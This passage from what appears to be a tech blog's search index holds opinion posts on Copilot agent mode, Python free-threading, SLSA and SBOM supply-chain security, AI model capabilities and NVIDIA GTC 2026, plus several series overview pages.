I\u0026rsquo;ve watched it fix its own type errors, install missing dependencies, and correct import paths across multiple files. 
This self-correcting loop is what separates agent mode from the earlier inline suggestions.\nWhere it also shines is in codebases with strong conventions. If you have consistent patterns — say, every service follows the same interface, every API endpoint has the same middleware chain — agent mode picks up on these patterns and replicates them faithfully. It\u0026rsquo;s essentially learned your team\u0026rsquo;s style guide from context.\nWhere It Falls Short # Let\u0026rsquo;s be honest about the limitations. Agent mode struggles with architectural decisions. Ask it to \u0026ldquo;design a notification system\u0026rdquo; and you\u0026rsquo;ll get something that works but might not be the right abstraction for your specific constraints. It doesn\u0026rsquo;t understand your team\u0026rsquo;s roadmap, your scale requirements, or the political dynamics of your organization that influence technical choices.\nI\u0026rsquo;ve also noticed it can be confidently wrong in subtle ways. It\u0026rsquo;ll produce code that passes tests but introduces a race condition, or it\u0026rsquo;ll use an API pattern that\u0026rsquo;s technically correct but performs poorly at scale. These are exactly the kinds of bugs that are hardest to catch in review because the code looks right.\nThe token window, while large, still limits how much of a large codebase the agent can reason about simultaneously. In monorepos with hundreds of packages, it sometimes makes changes that conflict with distant parts of the codebase it hasn\u0026rsquo;t loaded into context.\nThe Changing Role of Code Review # What concerns me most isn\u0026rsquo;t the quality of the generated code — that will improve. It\u0026rsquo;s the impact on code review culture. When a developer writes code by hand, the review process is a conversation between two humans who both understand the intent and constraints. 
When an agent writes the code, the reviewer is essentially auditing machine output, which requires a different and arguably more demanding skillset. This is similar to the challenges we see with AI-assisted testing, where human oversight remains critical.\nI\u0026rsquo;ve already seen junior developers on my team approve agent-generated PRs with a cursory glance because \u0026ldquo;Copilot wrote it, so it\u0026rsquo;s probably fine.\u0026rdquo; This is dangerous. We need to be more rigorous in reviewing AI-generated code, not less, precisely because the failure modes are different from human-written code.\nTeams adopting agent mode should invest in better automated testing, stronger linting rules, and clear guidelines about which types of tasks are appropriate for agent mode versus human authorship. These patterns apply across agent-based systems more broadly. The core principle remains: AI tools augment judgment, they don\u0026rsquo;t replace it.\nMy Take # After thirty years of writing software, I\u0026rsquo;ve seen plenty of tools that promised to change everything. Most delivered incremental improvements. Copilot agent mode is genuinely useful — it\u0026rsquo;s the first AI coding tool where I regularly think \u0026ldquo;that saved me real time\u0026rdquo; rather than \u0026ldquo;that was a neat demo.\u0026rdquo;\nBut it\u0026rsquo;s a power tool, not a replacement for engineering judgment. The developers who will thrive with agent mode are the ones who can clearly articulate what they want, critically evaluate the output, and know when to take the wheel back. The ones who treat it as a magic box that produces correct code will ship bugs they don\u0026rsquo;t understand.\nGitHub has built something impressive here. The GA release is polished, the VS Code integration is seamless, and the pricing at the existing Copilot tier is reasonable. 
Just remember: the most important skill in this new world isn\u0026rsquo;t prompting — it\u0026rsquo;s knowing when the machine\u0026rsquo;s answer isn\u0026rsquo;t good enough.\nThis is part of my ongoing AI in Development series, tracking how AI tools are reshaping software engineering practices.\n","date":"26 March 2026","externalUrl":null,"permalink":"/posts/260326-github-copilot-agent-mode/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot’s agent mode is now generally available, promising autonomous multi-step coding. Here’s what works, what doesn’t, and what it means for how we build software.","title":"GitHub Copilot Agent Mode Goes GA — What It Means for Developer Workflows","type":"posts"},{"content":"Python\u0026rsquo;s Global Interpreter Lock — the GIL — has been the subject of more conference talks, blog posts, and heated debates than perhaps any other single feature in programming language history. And now, with Python 3.14 deep in its development cycle, we\u0026rsquo;re seeing the most significant progress toward making the GIL optional that the language has ever achieved.\nI\u0026rsquo;ve been writing Python professionally for over twenty years, and I\u0026rsquo;ll admit that for most of that time, the GIL was a theoretical concern rather than a practical one. But the landscape has changed. As Python becomes the default language for AI/ML workloads, data engineering, and high-throughput web services, the single-threaded limitation is becoming a genuine bottleneck for a growing class of applications. The broader development ecosystem evolution reflects this shift toward languages that prioritize concurrency and parallel execution. 
This mirrors architectural decisions happening across the tech stack, from JavaScript runtime evolution to Rust\u0026rsquo;s systems programming dominance, where concurrency and parallelism are table stakes.\nWhere We Are in the Free-Threading Journey # Let\u0026rsquo;s get the timeline straight. PEP 703, authored by Sam Gross, proposed making the GIL optional in CPython. It was accepted in 2023 with an incremental implementation plan. Python 3.13, released in October 2024, included the first experimental free-threaded build as an opt-in compilation flag. Python 3.14 is continuing to mature this feature.\nThe current state is that free-threaded CPython builds are available and increasingly functional, but they\u0026rsquo;re still considered experimental. The --disable-gil build flag produces a Python interpreter that can run multiple threads truly concurrently, executing Python bytecode on separate CPU cores simultaneously.\nThis is a fundamental change. In traditional CPython, threading is useful for I/O-bound workloads (waiting for network responses, file operations) but provides no benefit for CPU-bound work because the GIL ensures only one thread executes Python bytecode at a time. Free-threaded Python removes this limitation entirely. This architectural improvement aligns with how other language ecosystems are prioritizing parallelism and concurrency.\nThe Performance Reality # The performance story is more nuanced than \u0026ldquo;remove the GIL, everything gets faster.\u0026rdquo; In fact, the initial free-threaded builds in 3.13 showed a single-threaded performance regression of roughly 5-10% compared to the GIL-enabled build. This overhead comes from the fine-grained locking and atomic operations needed to make CPython\u0026rsquo;s internals thread-safe without a global lock.\nThe Python core team has been working to reduce this overhead in the 3.14 cycle, and the results are encouraging. 
Recent benchmarks I\u0026rsquo;ve seen on the CPython issue tracker show the single-threaded regression narrowing to the 3-5% range for most workloads, with some benchmarks showing near-parity.\nFor multi-threaded CPU-bound workloads, however, the gains are substantial. A properly parallelized numerical computation can see near-linear scaling across CPU cores — something that was simply impossible with the GIL. In my testing with a Monte Carlo simulation written in pure Python, I saw a 3.7x speedup on a 4-core machine using the free-threaded build with four worker threads. Not quite linear, but dramatically better than the ~1.0x you\u0026rsquo;d get with GIL-enabled CPython.\nThe caveat is important: most real-world Python applications aren\u0026rsquo;t doing pure CPU-bound work in Python. They\u0026rsquo;re calling into C extensions (NumPy, pandas), doing I/O, or running workloads where the GIL isn\u0026rsquo;t the bottleneck. For these applications, the benefit of free-threading ranges from minimal to zero, while the single-threaded overhead is a real cost.\nThe C Extension Challenge # This is where it gets complicated. CPython\u0026rsquo;s enormous ecosystem of C extensions — the very thing that makes Python so powerful for scientific computing and system integration — was built assuming the GIL exists. Many C extensions rely on the GIL for thread safety, either explicitly or (more problematically) implicitly.\nFree-threaded builds define the Py_GIL_DISABLED macro and use a different ABI, so extensions need to be built specifically for free-threaded Python. More importantly, they need to be audited and potentially modified to be thread-safe without the GIL\u0026rsquo;s protection.\nThe major scientific computing libraries are making progress here. NumPy has been working on free-threading compatibility, and many operations that release the GIL internally (which NumPy has done for years for performance) work well. 
This mirrors how infrastructure and tooling consolidate around performance. But the long tail of smaller C extensions is a different story. If your project depends on a niche C extension that hasn\u0026rsquo;t been updated, free-threaded Python may not be an option for you yet.\nThe Python Packaging Authority (PyPA) has been working on infrastructure to support free-threaded wheels — binary packages built against the free-threaded ABI. This is essential for making the feature practical, because expecting every user to compile extensions from source is a non-starter.\nWhat This Means for Application Architecture # For years, the standard advice for CPU-bound parallelism in Python has been to use multiprocessing instead of threading. This works, but it comes with significant overhead: each process has its own memory space, so data sharing requires serialization (pickle), shared memory, or inter-process communication. For workloads that need to share large data structures, this overhead can negate the parallelism benefits.\nFree-threaded Python opens up a middle path. Threads share memory natively, so you can parallelize CPU-bound work without the serialization overhead of multiprocessing. This is particularly valuable for:\nData processing pipelines where multiple stages need access to shared data structures Web servers handling CPU-intensive request processing (think image processing, PDF generation, or ML inference) Scientific simulations with shared state that would be expensive to serialize Game servers and real-time systems where latency matters and process-based parallelism adds unacceptable overhead The concurrent.futures module works transparently with free-threaded Python — you can switch from ProcessPoolExecutor to ThreadPoolExecutor and potentially see improved performance for CPU-bound tasks without changing your application logic. 
From an infrastructure perspective, this shift toward better parallelism primitives in cloud and platform design aligns with how modern systems are evolving to better utilize multi-core resources.\nMy Take: Cautious Optimism # I\u0026rsquo;ve lived through enough \u0026ldquo;this changes everything\u0026rdquo; moments in the Python ecosystem to be measured in my enthusiasm. But the free-threading work is genuinely significant, and I\u0026rsquo;m cautiously optimistic about where it\u0026rsquo;s heading.\nMy practical advice: if you\u0026rsquo;re starting a new Python project that has potential CPU-bound parallelism needs, design your code to be thread-safe from the start. Use threading primitives properly, avoid shared mutable state where possible, and structure your code so that it can benefit from free-threading when the feature matures. This discipline mirrors how AI-assisted testing helps catch concurrency issues before they reach production. The same concurrency principles apply across language ecosystems, where runtime improvements and developer tooling work together. Python\u0026rsquo;s tooling consolidation accelerates adoption of new capabilities like free-threading by reducing friction.\nDon\u0026rsquo;t migrate production workloads to free-threaded Python yet — it\u0026rsquo;s still experimental, the ecosystem support is incomplete, and the single-threaded performance regression is real. But do start testing your code against the free-threaded build in CI. Identifying thread-safety issues now is much cheaper than discovering them later.\nThe GIL has been part of Python\u0026rsquo;s identity for over 30 years. Removing it — even optionally — is one of the most ambitious changes the CPython project has ever undertaken. The fact that it\u0026rsquo;s happening incrementally, with careful attention to backwards compatibility and ecosystem impact, gives me confidence that the Python team is approaching it the right way. 
We\u0026rsquo;re not there yet, but we\u0026rsquo;re closer than we\u0026rsquo;ve ever been.\n","date":"19 March 2026","externalUrl":null,"permalink":"/posts/260319-python-314-free-threading/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14’s development is pushing free-threading forward. Here’s what the removal of the GIL means practically, and why it matters more than you might think.","title":"Python 3.14 and the Free-Threading Revolution — Is the GIL Finally Behind Us?","type":"posts"},{"content":" Overview # Python has evolved from a general-purpose scripting language into a powerhouse for data science, AI, and systems programming. This series tracks Python\u0026rsquo;s development trajectory through version releases, performance optimizations, type system advances, and the expanding ecosystem of tools and frameworks reshaping the language\u0026rsquo;s identity.\nThe story isn\u0026rsquo;t just about new syntax—it\u0026rsquo;s about how Python maintains backward compatibility while adopting ideas from Rust, Go, and functional programming paradigms.\nWhat You\u0026rsquo;ll Find Here # Language Releases: Analysis of major version changes, including performance improvements via faster CPython, structural pattern matching, and GIL optimization efforts.\nPerformance \u0026amp; Speed: Tracking Python\u0026rsquo;s performance roadmap, JIT compilation experiments, and how tools like PyPy, Mojo, and compiled extensions challenge Python\u0026rsquo;s speed reputation.\nType System Advances: Evolution of type hints, gradual typing adoption, and how Python balances dynamic and static worlds.\nAI \u0026amp; Data Science Boom: How PyTorch, TensorFlow, JAX, and other frameworks have made Python the de facto language for ML engineering and data science.\nEcosystem Maturation: Package management with uv and pip-tools, virtual environments, dependency resolution, and community standardization efforts.\nLearning Path # Understand the 
performance journey — why Python remains popular despite being slower, and what\u0026rsquo;s being done about it Track the type system evolution — from type hints to gradual adoption and real-world benefits Explore the AI revolution — why Python became the lingua franca of machine learning Follow ecosystem improvements — modern tooling for dependency management and environment management Monitor language proposals — PEPs shaping Python\u0026rsquo;s future Key Technologies Covered # Core Language: CPython, PyPy, GIL, async/await patterns, recent Python versions (3.10+) Type System: Type hints, Pyright, mypy, Pydantic, and gradual typing Data Science: NumPy, Pandas, Polars, scikit-learn, and vectorization techniques AI/ML: PyTorch, TensorFlow, JAX, Hugging Face, and transformer models Performance Tools: Cython, meson, build system improvements, compiled extensions Related Series # Explore complementary areas: AI Models \u0026amp; Releases (foundation models and their Python libraries), Systems \u0026amp; Emerging Languages (languages competing with Python for systems work)\n","date":"19 March 2026","externalUrl":null,"permalink":"/series/python-evolution/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Python Evolution","type":"series"},{"content":"If there\u0026rsquo;s one security topic that has shifted from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;non-negotiable\u0026rdquo; over the past two years, it\u0026rsquo;s software supply chain security. 
The combination of high-profile attacks (the xz Utils backdoor aftermath and the TanStack npm compromise), regulatory pressure, and maturing tooling has created a situation where organizations that aren\u0026rsquo;t thinking about supply chain integrity are falling dangerously behind.\nThis week, I want to dig into where things actually stand with SLSA (Supply-chain Levels for Software Artifacts) and SBOM (Software Bill of Materials) adoption, because the gap between the theoretical frameworks and practical implementation is where most teams struggle.\nThe Regulatory Push Is Real # The US Executive Order on Improving the Nation\u0026rsquo;s Cybersecurity (EO 14028) from 2021 set the wheels in motion, and we\u0026rsquo;re now seeing the downstream effects ripple through the entire industry. Federal agencies have been requiring SBOMs from software vendors, and that requirement is cascading to subcontractors and commercial software providers who want to sell to government customers.\nIn Europe, the Cyber Resilience Act is adding another layer of requirements. Products with digital elements sold in the EU market will need to meet security requirements that include vulnerability handling and — critically — providing SBOMs. The compliance timeline extends through 2027, but organizations are already preparing.\nWhat\u0026rsquo;s changed in the last year is that these aren\u0026rsquo;t just government requirements anymore. I\u0026rsquo;m seeing SBOM requests in commercial procurement processes, enterprise security questionnaires, and even venture capital due diligence for security startups. The market has decided that software transparency isn\u0026rsquo;t optional.\nSLSA: From Framework to Practice # SLSA (pronounced \u0026ldquo;salsa\u0026rdquo;) provides a graduated framework for supply chain security, with build levels from 1 to 3 in the v1.0 specification (the original v0.1 draft defined four) representing increasing security guarantees. 
When it was first introduced by Google, it felt somewhat academic — a nice framework that would be difficult to implement in practice.\nThat perception has shifted dramatically. The tooling ecosystem around SLSA has matured to the point where achieving Level 2 or even Level 3 compliance is feasible for most organizations with modern CI/CD pipelines.\nAt Level 1, you need to document your build process. At Level 2, you need a hosted build service that generates authenticated provenance — essentially, a signed attestation that says \u0026ldquo;this artifact was produced by this build process from this source code.\u0026rdquo; At Level 3, the build platform itself needs to provide additional hardening and isolation guarantees.\nIn practice, achieving SLSA Level 2 with GitHub Actions has become almost trivial. The SLSA GitHub Generator produces provenance attestations that are verified by the Sigstore ecosystem. For most projects, it\u0026rsquo;s a matter of adding a workflow file and configuring artifact signing. I recently set this up for a client\u0026rsquo;s Node.js project, and the entire implementation took less than a day, including testing.\nLevel 3 is harder, requiring features like isolated build environments and non-falsifiable provenance. But even here, the major CI/CD platforms are adding native support. GitHub\u0026rsquo;s Artifact Attestations feature, which reached GA last year, provides many of the Level 3 guarantees out of the box.\nSBOMs: The Devil Is in the Details # Generating an SBOM is easy. Generating a useful SBOM is hard.\nThe two dominant SBOM formats — SPDX (backed by the Linux Foundation) and CycloneDX (backed by OWASP) — are both mature enough for production use. Tools like Syft, Trivy, and Microsoft\u0026rsquo;s SBOM tool can generate SBOMs from container images, source code repositories, and package manifests with minimal configuration.\nThe challenge is in what you do with the SBOM after generating it. 
An SBOM sitting in an artifact repository isn\u0026rsquo;t providing security value. The value comes from:\nContinuous vulnerability monitoring. Mapping SBOM components against vulnerability databases (CVE, OSV, GitHub Advisory Database) to identify affected deployments when new vulnerabilities are disclosed. Tools like Grype, Dependency-Track, and Snyk do this, but integrating them into operational workflows — alerting, triage, patching — requires thought.\nLicense compliance. SBOMs contain license information for every dependency, which is critical for organizations with legal requirements around open-source usage. This was always important, but having machine-readable license data makes enforcement practical.\nIncident response. When the next Log4j-scale vulnerability drops, an organization with comprehensive SBOMs can answer \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days. This alone justifies the investment, in my experience.\nProcurement and vendor assessment. Consuming SBOMs from your vendors and evaluating their dependency choices and update practices. This is the buyer-side benefit that\u0026rsquo;s driving procurement requirements.\nThe Dependency Problem Isn\u0026rsquo;t Going Away # All of this work on supply chain security exists because modern software depends on an enormous graph of third-party components. A typical Node.js application pulls in hundreds of transitive dependencies. A Python data science project might depend on compiled C libraries, Fortran numerical code, and CUDA kernels — each with their own supply chain.\nI\u0026rsquo;ve been doing some analysis of dependency trees in projects I work on, and the numbers are sobering. One mid-sized microservice I maintain has 847 transitive npm dependencies. Of those, about 30% haven\u0026rsquo;t been updated in over a year, and a dozen are maintained by a single individual with no organizational backing. 
The recent compromises of popular packages demonstrate exactly how vulnerable this situation makes us.\nThis isn\u0026rsquo;t a problem that SBOMs or SLSA solve directly — they make the problem visible, which is the necessary first step. But the underlying issue of critical infrastructure depending on unpaid volunteer maintainers remains one of the most significant risks in our industry. Attacks like the Ultralytics supply chain compromise and the PyTorch Lightning malware show how quickly threat actors target popular projects.\nInitiatives like the Alpha-Omega Project and the Sovereign Tech Fund are directing funding toward critical open-source projects, which helps. But we\u0026rsquo;re still far from a sustainable model for maintaining the software supply chain that the global economy depends on.\nMy Take: Start Small, but Start Now # If your organization hasn\u0026rsquo;t started implementing supply chain security practices, the good news is that the barrier to entry has never been lower. Here\u0026rsquo;s my practical recommendation:\nWeek one: Add SBOM generation to your CI pipeline. Use Syft or your platform\u0026rsquo;s built-in tool. Store the SBOMs alongside your build artifacts.\nWeek two: Set up Dependency-Track or a similar tool to ingest your SBOMs and monitor for vulnerabilities. Configure alerts for critical- and high-severity CVEs.\nMonth one: Implement SLSA Level 2 provenance for your most critical artifacts. If you\u0026rsquo;re on GitHub Actions, this is straightforward.\nQuarter one: Review your SBOM data. Identify dependencies with maintenance concerns. Evaluate alternatives for the highest-risk components.\nThis isn\u0026rsquo;t going to make you immune to supply chain attacks — nothing will. 
But it puts you in a dramatically better position than most organizations, and it satisfies the compliance requirements that are increasingly becoming table stakes for doing business.\nThe direction is clear: software supply chain transparency is becoming mandatory, and the tools to achieve it are ready. The only question is whether you implement it proactively or reactively, and in my experience, proactive is always cheaper.\nCross-Cluster Topics # This supply chain security hub connects to other topic clusters:\nAI + Security: Supply Chain Malware in PyTorch Lightning and EU AI Act compliance discuss how AI infrastructure faces unique supply chain risks Development + Security: TanStack npm compromise covers JavaScript ecosystem vulnerabilities, and xz Utils aftermath provides a comprehensive incident analysis Infrastructure + Security: See the Cloud Next platform engineering hub for how infrastructure teams implement supply chain security at scale ","date":"12 March 2026","externalUrl":null,"permalink":"/posts/260312-supply-chain-security-slsa-adoption/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Supply chain security frameworks like SLSA and SBOM requirements are moving from recommendations to mandates. Here’s what developers need to know about the shifting landscape.","title":"Software Supply Chain Security Gets Serious — SLSA and SBOM Adoption Accelerates","type":"posts"},{"content":"The landscape of AI model capabilities has evolved dramatically in recent years, and the pace of change is accelerating. As developers building AI-powered systems, it\u0026rsquo;s essential to understand the different capabilities available and how they fundamentally change what we can build.\nThe Core Capability Evolution # Understanding how AI models work has become foundational knowledge for any developer. 
Claude\u0026rsquo;s in-context learning represents a paradigm shift — moving from fine-tuning as the primary customization mechanism to treating prompts and context as the primary tool for teaching models.\nThis shift builds on earlier work in transformer efficiency. The Reformer architecture demonstrated how we could process longer sequences efficiently, and years of progress eventually led to the massive context windows we have today.\nExtended Thinking and Advanced Reasoning # The next frontier moves beyond in-context learning to how models reason over context. Extended thinking models like Claude 3.7 Sonnet introduce deliberate reasoning steps, where the model can think through complex problems before generating responses.\nThis capability pairs beautifully with reasoning-focused models like OpenAI\u0026rsquo;s O3 and O4 Mini, which prioritize deep reasoning over raw speed. These models demonstrate that capability boundaries are moving, and reasoning itself is becoming a first-class feature rather than an emergent property.\nPractical Applications in Development # The model capability improvements translate directly to how developers build systems. AI-assisted testing frameworks leverage these advanced reasoning capabilities to validate code, catch bugs, and ensure correctness without manual intervention.\nMore broadly, AI-powered development tools and GitHub Copilot\u0026rsquo;s agent mode show how these models handle real development workflows. The models aren\u0026rsquo;t just autocompleting code — they\u0026rsquo;re reasoning about architectural decisions and generating multi-step solutions.\nInfrastructure Implications # Supporting these advanced capabilities requires serious infrastructure. Anthropic\u0026rsquo;s compute strategy recognizes that efficiency at scale is itself a competitive advantage. 
As context windows grow and reasoning becomes more complex, cloud cost optimization becomes critical.\nFor teams deploying these models locally, Docker\u0026rsquo;s Model Runner makes experimentation more accessible. The ability to run and iterate on models locally, then scale to cloud infrastructure, is becoming standard practice.\nOpen Source Models and Alternatives # The proprietary frontier models get the most attention, but open-source alternatives continue to mature. Meta\u0026rsquo;s Llama 3.1 release demonstrated that open models can deliver compelling capabilities, and the ecosystem around them continues to improve.\nThe broader AI infrastructure landscape shows how different providers are positioning themselves. Whether you choose open models, API-based services, or hybrid approaches depends on your specific constraints and requirements.\nGovernance and Responsible Development # As model capabilities advance, governance becomes increasingly important. The EU AI Act places specific requirements on general-purpose AI models, and understanding these compliance requirements is essential for teams building with frontier models.\nTeams should also consider how Model Context Protocol adoption and advanced tooling support responsible development practices. Better tooling and standards are making it easier to build systems that are both capable and responsible.\nThe Trajectory Forward # The evolution from ChatGPT\u0026rsquo;s explosive first month through today\u0026rsquo;s reasoning and extended thinking models has been remarkably fast. The pattern we\u0026rsquo;re seeing — rapid capability improvements followed by developer ecosystem maturation — suggests this pace will continue.\nTeams building today have access to an unprecedented toolkit. 
The question isn\u0026rsquo;t whether to use AI models — it\u0026rsquo;s which models, which capabilities, and what architectural patterns make sense for your specific problem.\nMy Take # We\u0026rsquo;re in the middle of a capability inflection point. The models available today can handle tasks that required specialized training just two years ago. In-context learning eliminated fine-tuning for many use cases. Extended reasoning is eliminating the need for chain-of-thought prompting tricks.\nThe teams that will win are those that understand their models as tools with specific capabilities and limitations, rather than general-purpose solvers. Pair that understanding with thoughtful governance and compliance practices, and you have the foundation for building genuinely valuable AI systems.\nThe next capability frontier is probably already being worked on. Stay curious about what\u0026rsquo;s coming, but focus your energy on what these models can do for your users right now.\n","date":"10 March 2026","externalUrl":null,"permalink":"/posts/260310-ai-llm-models-capabilities-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Tracking the rapid evolution of AI model capabilities, from in-context learning and extended thinking to reasoning models reshaping development workflows.","title":"AI/LLM Models \u0026 Capabilities — From In-Context Learning to Extended Reasoning","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GTC conference is just around the corner, and the rumor mill is working overtime. After last year\u0026rsquo;s event delivered the Blackwell architecture and a roadmap that had the industry scrambling to keep up, expectations for GTC 2026 are stratospheric. 
But beyond the keynote theatrics and Jensen Huang\u0026rsquo;s leather jacket, there are real infrastructure implications that developers and platform teams need to think about.\nI\u0026rsquo;ve been tracking NVIDIA\u0026rsquo;s trajectory for a while now, and what strikes me most isn\u0026rsquo;t the raw compute numbers — it\u0026rsquo;s how profoundly the GPU ecosystem is reshaping the entire stack, from data center design to software frameworks to how we think about application architecture.\nThe Blackwell Generation: A Year in Production # Before looking ahead, it\u0026rsquo;s worth taking stock of where we are. The Blackwell GPU architecture has been shipping for several months now, and the real-world performance data is starting to paint a clear picture. The B200 and GB200 configurations have delivered on most of their promises — the second-generation transformer engine with FP4 precision has proven particularly impactful for inference workloads.\nWhat\u0026rsquo;s been most interesting to me, working with teams deploying these systems, is how the NVLink interconnect improvements have changed the game for multi-GPU inference. Running large language models across multiple GPUs used to involve painful compromises around tensor parallelism and pipeline parallelism. The higher-bandwidth NVLink in Blackwell has made these configurations significantly more practical, even for latency-sensitive applications.\nBut here\u0026rsquo;s the thing that doesn\u0026rsquo;t make the marketing slides: the operational complexity of running these systems is substantial. Power requirements, cooling demands, and the expertise needed to optimize workloads for the new architecture represent real costs that go beyond the sticker price of the hardware.\nWhat to Watch for at GTC 2026 # Based on NVIDIA\u0026rsquo;s published roadmap and industry signals, there are several areas I\u0026rsquo;m watching closely.\nNext-generation architecture announcements. 
NVIDIA has been on an annual cadence for new GPU architectures, and all signs point to a Blackwell successor being unveiled at GTC. The rumored improvements center on further scaling of transformer-specific acceleration, improved memory bandwidth, and potentially new precision formats optimized for emerging model architectures.\nSoftware stack updates. Honestly, this is where I think the most impactful announcements will be for working developers. CUDA continues to evolve, but the higher-level frameworks — TensorRT, Triton Inference Server, NeMo — are where most teams interact with NVIDIA\u0026rsquo;s ecosystem. These improvements align with broader AI infrastructure optimization and observability maturation. Improvements to model optimization, quantization workflows, and multi-model serving could have more practical impact than raw hardware specs.\nNetworking and interconnect. NVIDIA\u0026rsquo;s acquisition of Mellanox continues to pay strategic dividends. The convergence of GPU compute and high-performance networking is enabling new architectures for distributed training and inference. I expect to see announcements around next-generation NVLink and InfiniBand configurations that further blur the line between individual servers and cluster-scale compute.\nEdge and inference-specific hardware. Not everything is about training massive models in hyperscale data centers. There\u0026rsquo;s a growing market for inference at the edge, and NVIDIA\u0026rsquo;s Jetson and DRIVE platforms serve this segment. GTC has historically been where new edge hardware gets announced, and the demand for on-device AI continues to accelerate.\nThe Compute Cost Conversation # Let me step back from the product announcements and talk about something that comes up in virtually every architecture discussion I\u0026rsquo;m involved in: the economics of AI compute.\nNVIDIA\u0026rsquo;s dominance in AI accelerators gives them enormous pricing power. 
The total cost of ownership for a GPU cluster — including hardware, power, cooling, networking, and the engineering talent to manage it — is staggering. Even with cloud options from AWS, Azure, and GCP, GPU compute remains one of the largest line items in any AI project budget.\nThis is driving several interesting trends. First, there\u0026rsquo;s intense interest in optimization — techniques like quantization, distillation, and speculative decoding that let you do more with less compute. Second, the AMD and Intel alternative accelerator ecosystem is getting more serious attention, not because they\u0026rsquo;ve caught up with NVIDIA on raw performance, but because competition on price-performance could be meaningful for many workloads.\nThird, and this is something I find particularly interesting, there\u0026rsquo;s a growing movement toward designing AI applications that are compute-aware from the start. Rather than training the largest possible model and then trying to make it cheaper to serve, teams are increasingly choosing model architectures and sizes based on their deployment constraints. This is good engineering practice, but it\u0026rsquo;s been driven as much by economics as by principle.\nThe Developer Experience Gap # One area where I think NVIDIA still has significant room for improvement is developer experience. CUDA has been the dominant GPU programming model for over a decade, and it shows — both in terms of ecosystem maturity (positive) and accumulated complexity (negative).\nSetting up a CUDA development environment, debugging GPU kernels, and profiling performance remain harder than they should be in 2026. 
The tooling has improved — Nsight is genuinely useful, and the container-based development workflows have reduced \u0026ldquo;works on my machine\u0026rdquo; problems — but there\u0026rsquo;s still a steep learning curve that limits who can effectively work with GPU-accelerated applications.\nProjects like Triton (the programming language from OpenAI, not NVIDIA\u0026rsquo;s inference server) and JAX have shown that higher-level abstractions over GPU compute are possible without sacrificing too much performance. I\u0026rsquo;d like to see NVIDIA invest more in making their hardware accessible to developers who aren\u0026rsquo;t GPU specialists, because the bottleneck in AI deployment is increasingly human expertise rather than hardware availability.\nMy Take: Beyond the Hype Cycle # GTC has become the de facto annual checkpoint for the AI infrastructure industry, and for good reason — NVIDIA\u0026rsquo;s hardware roadmap effectively defines what\u0026rsquo;s possible for AI workloads in the near term. But I\u0026rsquo;d encourage teams to approach the announcements with a practical lens.\nThe most impactful developments for most organizations won\u0026rsquo;t be the headline-grabbing hardware specs. They\u0026rsquo;ll be the incremental improvements to software frameworks, deployment tools, and optimization techniques that make existing hardware more productive. A 10% improvement in TensorRT\u0026rsquo;s inference optimization is worth more to most teams than a 50% improvement in peak theoretical FLOPS on hardware they won\u0026rsquo;t have access to for months.\nI\u0026rsquo;ll be covering the actual GTC announcements next week once we have concrete details to analyze. For now, the preparation I\u0026rsquo;d recommend is straightforward: audit your current GPU utilization, understand your inference cost structure, and identify the bottlenecks in your AI pipeline. The economic pressures shaping AI deployment decisions apply equally to infrastructure investments. 
Whatever NVIDIA announces, those fundamentals will determine how much value you can extract from it.\n","date":"5 March 2026","externalUrl":null,"permalink":"/posts/260305-nvidia-gtc-2026-blackwell-ultra/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With NVIDIA’s GTC 2026 around the corner, here’s what developers and infrastructure teams should be watching for in the next generation of AI compute.","title":"GTC 2026 Preview — What NVIDIA's Next Move Means for AI Infrastructure","type":"posts"},{"content":" Overview # Open source powers modern software, yet it operates under unique incentives and challenges. This series explores the human side of open source—how projects are governed, how communities are built, the licensing challenges and battles, sustainability questions, and the infrastructure that underpins millions of developers\u0026rsquo; work.\nUnderstanding these dynamics matters whether you consume open source, contribute to it, or build on top of it.\nWhat You\u0026rsquo;ll Find Here # Project Governance: How successful open source projects organize decision-making, manage maintainers, handle conflicts, and evolve without fragmenting.\nLicensing Battles: Understanding GPL, MIT, Apache 2.0 and new licenses—what each permits, what disputes they\u0026rsquo;ve caused, and how projects navigate licensing complexity.\nCommunity Dynamics: How communities form, attract contributors, onboard newcomers, and maintain health as projects scale.\nSustainability Challenges: The tension between volunteer contributions and maintaining critical infrastructure, funding models, and burnout.\nInfrastructure \u0026amp; Security: Supply chain security in open source, dependency health, and how the ecosystem is raising security baselines.\nMarket Dynamics: Open source monetization, commercial forks, commercial support models, and how companies build businesses around open projects.\nLearning Path # Understand open source culture — the 
values, incentives, and norms that shape how communities work Navigate licensing effectively — choose appropriate licenses for your projects, understand implications for dependencies Learn governance patterns — how successful projects make decisions and evolve Engage as a contributor — best practices for contributing, understanding community norms, and getting contributions accepted Build sustainable projects — if you maintain open source, understand sustainability, contributor retention, and funding Key Topics Covered # Governance Models: Benevolent dictator, steering committees, meritocracies, and corporate-backed projects Licenses: GPL, AGPL, MIT, Apache 2.0, SSPL, and license compatibility Licensing Issues: GPL enforcement, license creep, dual licensing, and commercial implications Community Building: Contributor onboarding, code of conduct, communication norms, and conflict resolution Sustainability: Funding models, grant programs, sponsorships, and maintainer burnout Infrastructure: Package managers, build systems, CI/CD, and dependency tracking Market Dynamics: Open source vs. SaaS, commercial forks, and business models built on open source Related Series # Explore complementary areas: Supply Chain Security (security implications of open source dependencies), Open Source AI (open development in AI)\n","date":"26 February 2026","externalUrl":null,"permalink":"/series/open-source-chronicles/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Open Source Chronicles","type":"series"},{"content":"It\u0026rsquo;s been about two and a half years since HashiCorp\u0026rsquo;s license change sparked the creation of OpenTofu, and the project has reached an interesting inflection point. What started as a community reaction to the BSL relicense has evolved into a genuinely independent infrastructure-as-code tool with its own roadmap and identity. 
